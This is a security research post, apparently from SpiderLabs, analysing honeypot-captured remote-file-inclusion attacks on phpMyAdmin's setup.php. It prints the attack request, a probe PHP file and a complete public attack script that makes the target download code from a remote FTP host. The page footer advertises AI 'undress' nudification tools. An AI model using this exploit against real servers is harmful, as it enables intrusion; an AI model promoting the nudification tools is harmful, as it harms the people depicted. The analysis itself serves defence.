PhpMyAdmin setup.php RFI Attacks Detected
SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our centralModSecurity AuditConsole logging host today and I noticed
SpiderLabs is the corporate sponsor of the WASC Distributed Web Honeypots Project which is an awesome research project to identify automated web attacks. I was looking in our central ModSecurity AuditConsole logging host today and I noticed a spike in traffic from some Russian IPs that were scanning for the PMASA-2010-4 vulnerability in the PhpMyAdmin setup.php script.
Let's look at the raw ModSecurity audit log data of the inbound request:
--4064df0e-A-- [10/Apr/2012:18:05:55 +0000] T4R2gwowybkAAHp9G@sAAAAF 212.24.61.167 38767 XXX.XXX.XXX.XXX 80 --4064df0e-B-- POST /pma/scripts/setup.php HTTP/1.1 Connection: close Host: 176.34.207.219 Referer: 176.34.207.219 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] Content-Type: application/x-www-form-urlencoded Content-Length: 238 --4064df0e-C-- action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22ftp%3A%2F%2Fthewinecompany%3AgXNbUEwfLa%4046%2E32%2E228%2E222%2F%2Ea%2Fid%2Etxt%22%3B%7D%7D
If we URL decode the request body data, we get this:
action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:
{<span><strong>s:6:"source";s:55:"ftp://thewinecompany:gXNbUEwfLa@46.32.228.222/.a/id.txt"</strong></span>;}}As you can see, the attacker is attempting overwrite the PhpMyAdmin configuration file by instructing it to use FTP to download and run the "id.txt" file on a remote site. The contents of the id.txt file is PHP code:
<?php print(base64_decode("c3Q0cjc="));
echo(php_uname());
print(base64_decode("ZjFuMTVo"));
die;
?>Looking at what this file is doing, it appears to be a simple probe to identify if the target web application is vulnerable to this type of RFI attack. If the application responds with the output from these PHP commands, then the attacker will proceed with other attacks. SpiderLabs Research was able to find the following script in public forums that launch similar attacks:
/* wtf zmeu was here haha,yeah me... found this sh*t bug on pmasux */
$arguments = getopt("a:b:c");
$pma_setup_url = $arguments[a];
//echo $arguments[a];
$ftp_code = 'ftp://devil:devil@85.10.138.51/c.txt';
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url;
$path = $parsed_url;
$query = $parsed_url;
($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';
$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);
while (!feof($fp))
{
if($feof_count >=200)
break;
$return .= fread($fp, 4800);
++$feof_count;
}
fclose($fp);
return $return;
}
$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,'','Opera');
preg_match('@name="token" value="(a-f0-9{32})"@is',$token_page,$token_array);
$token = $token_array[1];
preg_match_all('@Set-Cookie: (<span>^\r\n;</span>+)@is',$token_page,$cookie_array);
$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);
print
send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');This issue was patched in the php source code with the following update:
By filtering out non-word characters, it would prevent the attacker from injecting the RFI code.
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
AI Hentai Generator
免费生成ai无尽的。
热门文章
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
phpmyadmin怎么设置主键
Apr 07, 2024 pm 02:54 PM
表的主键是一列或多列,用于唯一标识表中每条记录。设置主键的步骤如下:登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。
wordpress的数据库存在什么地方
Apr 15, 2024 pm 10:39 PM
WordPress 数据库位于 MySQL 数据库中,存储着所有网站数据,可以通过托管提供商的仪表板、FTP 或 phpMyAdmin 访问。数据库名称与网站 URL 或用户名相关,访问需要使用数据库凭据,包括名称、用户名、密码和主机名,这些凭据通常存储在“wp-config.php”文件中。
phpmyadmin怎么添加外键
Apr 07, 2024 pm 02:36 PM
在 phpMyAdmin 中添加外键可以通过以下步骤实现:选择包含外键的父表。编辑父表结构,在“列”中添加新列。启用外键约束,选择引用表和键。设置更新/删除操作。保存更改。
phpmyadmin账号密码是什么
Apr 07, 2024 pm 01:09 PM
PHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见,建议更改默认密码。更改密码的方法:1. 登录 PHPMyAdmin;2. 选择 "privileges";3. 输入新密码并保存。忘记密码时,可通过停止 MySQL 服务并编辑配置文件的方式重置密码:1. 添加 skip-grant-tables 行;2. 登录 MySQL 命令行并重置 root 密码;3. 刷新权限表;4. 删除 skip-grant-tables 行,重启 MySQL 服务。
phpmyadmin日志在哪里
Apr 07, 2024 pm 12:57 PM
PHPMyAdmin日志文件的默认位置:Linux/Unix/macOS:/var/log/phpmyadminWindows:C:\xampp\phpMyAdmin\logs\日志文件用途:故障排除审计安全性
phpmyadmin怎么删除数据表
Apr 07, 2024 pm 03:00 PM
phpMyAdmin 中删除数据表的步骤:选择数据库和数据表;点击“操作”选项卡;选择“删除”选项;确认并执行删除操作。
为什么phpmyadmin拒绝访问
Apr 07, 2024 pm 01:03 PM
phpMyAdmin 拒绝访问的原因及解决方案:认证失败:检查用户名和密码是否正确。服务器配置错误:调整防火墙设置,检查数据库端口是否正确。权限问题:授予用户对数据库的访问权限。会话超时:刷新浏览器页面重新连接。phpMyAdmin 配置错误:检查配置文件和文件权限,确保启用了必需的 Apache 模块。服务器问题:等待一段时间后再重试或联系主机提供商。
phpmyadmin漏洞属于什么漏洞
Apr 07, 2024 pm 01:36 PM
phpMyAdmin 易受多种漏洞影响,包括:1. SQL 注入漏洞;2. 跨站点脚本 (XSS) 漏洞;3. 远程代码执行 (RCE) 漏洞;4. 本地文件包含 (LFI) 漏洞;5. 信息泄露漏洞;6. 权限提升漏洞。
